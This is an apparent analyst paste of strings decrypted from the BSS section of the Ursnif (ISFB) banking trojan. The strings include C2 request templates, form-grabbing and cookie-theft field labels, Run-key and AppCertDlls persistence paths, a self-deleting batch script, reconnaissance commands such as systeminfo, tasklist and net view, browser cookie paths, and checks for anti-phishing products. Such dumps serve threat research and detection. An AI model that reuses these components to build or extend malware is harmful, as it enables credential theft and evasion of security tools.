
ursnif bss section

a guest
Aug 10th, 2018
  1. KERNEL32.DLL AddVectoredExceptionHandler VirtualProtect ADVAPI32.DLL CryptGetUserKey LoadLibraryExW CHROME.DLL soft=1&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x&guid=%08x%08x%08x%08x version=%u&soft=1&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&guid=%08x%08x%08x%08x Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) ; Win64; x64 http:// https:// \\.\%s USER.ID %lu.exe /upd %lu Software\AppDataLow\Software\Microsoft\ Main Block Temp Client Ini Keys Scr Install LastTask LastConfig CrHook OpHook Exec NetCfg . \ http://constitution.org/usdeclar.txt C:\Program Files\Internet Explorer\iexplore.exe Software\Microsoft\Windows\CurrentVersion\Run System\CurrentControlSet\Control\Session Manager\AppCertDlls text image json html javascript URL: %s
  2. user=%s
  3. pass=%s URL: %s
  4. REF: %s
  5. LANG: %s
  6. AGENT: %s
  7. COOKIE: %s
  8. POST: USERID: %s
  9. USER: %s
  10. DEVICE: %s
  11. CLASS: %s
  12. INTERFACE: %s
  13. ADD: %u
  14. @%s@ grabs= HIDDEN %08x%08x%08x%08x @ID@ @GROUP@ @URL=*@ %s.%s http .bat .bin 64 Local\ \\.\pipe\ \Microsoft\ %APPDATA%\Microsoft\ %APPDATA% form log keys POST GET -01 --------------------------%04x%04x%04x Content-Type: multipart/form-data; boundary=%s Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" Content-Disposition: form-data; name="upload_file"; filename="%s" Content-Type: application/octet-stream --%s
  15. %s
  16. %s
  17.  
  18.  
  19. --%s--
  20. {%08X-%04X-%04X-%04X-%08X%04X} %08X-%04X-%04X-%04X-%08X%04X D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) S:(ML;;NRNWNX;;;LW) D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1) NSS3.DLL o p e n %lu.bat attrib -r -s -h %%1
  21. :%u
  22. del %%1
  23. if exist %%1 goto %u
  24. del %%0
  25. \Vars \Files \Config \Run /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s /UPD /SD /sd %lu client.dll client64.dll SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID ProductName CurrentVersion InstallDate C:\ \Software\Microsoft\Windows\CurrentVersion SystemRoot ** Accept-Encoding: cmd /C "%s> %s1" % A P P D A T A % \ M o z i l l a \ F i r e f o x \ P r o f i l e s NSPR4.DLL \ M a c r o m e d i a \ F l a s h P l a y e r \ SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings c o o k i e s . s q l i t e OPERA.EXE c o o k i e s . s q l i t e - j o u r n a l NTDLL.DLL * . s o l WININET.DLL * . t x t WS2_32.DLL ieapfltr \ c o o k i e . f f Referer: \ c o o k i e . i e Accept-Language: \ s o l s WSOCK32.DLL \ \ ? \ EnableSPDY3_0 * . * I S F B WININET.dll Cookie: Content-Security-Policy: - - u s e - s p d y = o f f g i f j p e g VERSION.dll driverquery.exe > % 0 2 u - % 0 2 u - % 0 2 u % 0 2 u : % 0 2 u : % 0 2 u
  26.  
  27. % s
  28.  
  29. % s
  30.  
  31.  
  32.  
  33. % s
  34.  
  35.  
  36.  
  37. % 0 2 u - % 0 2 u - % 0 2 u % 0 2 u : % 0 2 u : % 0 2 u
  38.  
  39. C l i p b o a r d
  40.  
  41.  
  42.  
  43. % s
  44.  
  45.  
  46.  
  47. identity W i n d o w s E x p l o r e r kernelbase Transfer-Encoding: D e l e g a t e E x e c u t e S O F T W A R E \ C l a s s e s \ C h r o m e c o m m a n d * . * ieframe urlmon ieui mshtml inetcpl.cpl NTDSAPI.DLL Host: User-Agent: Connection: Content-MD5: Content-Type: Content-Length: Content-Security-Policy-Report-Only: X-Frame-Options Access-Control-Allow-Origin: %x
  48. ocsp chunked
  49.  
  50. HTTP/1.1 404 Not Found
  51.  
  52. %02u:%02u:%02u EMPTY
  53. Cmd %s processed: %u | "%s" | %u
  54. Cmd %u parsing: %u PR_Read PR_Write PR_Close .set MaxDiskSize=0
  55. .set DiskDirectory1="%s"
  56. .set CabinetName1="%s"
  57. .set DestinationDir="%S"
  58. "%s"
  59. \setup.inf \setup.rpt makecab.exe /F "%s" systeminfo.exe tasklist.exe /SVC > reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s > cmd /U /C "type %s1 > %s & del %s1" net view > nslookup 127.0.0.1 > echo -------- > Unknown .pfx My AddressBook AuthRoot CertificateAuthority Disallowed Root TrustedPeople TrustedPublisher InternetSetStatusCallback HttpAddRequestHeadersW HttpAddRequestHeadersA HttpQueryInfoW HttpQueryInfoA InternetConnectW InternetConnectA InternetQueryDataAvailable HttpSendRequestW HttpSendRequestA InternetReadFileExW InternetReadFileExA InternetWriteFile InternetReadFile HttpOpenRequestW HttpOpenRequestA InternetCloseHandle recv closesocket WSASend WSARecv RegQueryValueExW RegGetValueW PR_Poll PR_GetError PR_SetError ExitProcess IsWow64Process Wow64EnableWow64FsRedirection LdrRegisterDllNotification LdrUnregisterDllNotification CreateProcessA CreateProcessW CreateProcessAsUserA CreateProcessAsUserW ZwProtectVirtualMemory LdrLoadDll LdrGetProcedureAddress RtlSetUnhandledExceptionFilter LoadLibraryA RtlExitUserThread %02u-%02u-%02u %02u:%02u:%02u
  60. PluginRegisterCallbacks .rdata .text .data DLL load status: %u %s=%s& 0123456789ABCDEF Main Blocked
  61. user_pref("network.http.spdy.enabled", false); /images/ Content-Encoding: p r e f s . j s %s=%s& .jpeg .gif .bmp %c%02X gzip deflate RapportGP RapportGP_x64 InternetGetCookieExA InternetGetCookieA Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{ }\ Flags Version * PhishWall5.1.exe \Mozilla\Firefox\Profiles\* \extensions\info.asia@securebrain.co.jp.xpi firefox.exe SOFTWARE\SecureBrain\PhishWall 8CA7E745-EF75-4E7B-BB86-8065C0CE29CA BB62FFF4-41CB-4AFC-BB8C-2A4D4B42BBDC sbpwu.exe iexplore.exe sbpw32.dll SBP2GIsPwUrlEx SBP2GIsPwUrlEx2 S:(ML;;NRNWNX;;;LW) HTTP/1.1 502 Bad Gateway
  62. Content-Length: 19
  63.  
  64. 502 Gateway Timeout Id = %u; Action = %u; ErrorCode = %u
  65. HTTP/1.1 crashdump.cab \info.txt g_BuildNumber = %u
  66. g_CurrentModule = 0x%p
  67. text section = 0x%p
  68. SizeOfRawData = %u
  69. ExceptionAddress = 0x%p
  70. ExceptionCode = 0x%x \dump.dmp DBGHELP.DLL MiniDumpWriteDump GIF 87a 89a !ÿ NETSCAPE2.0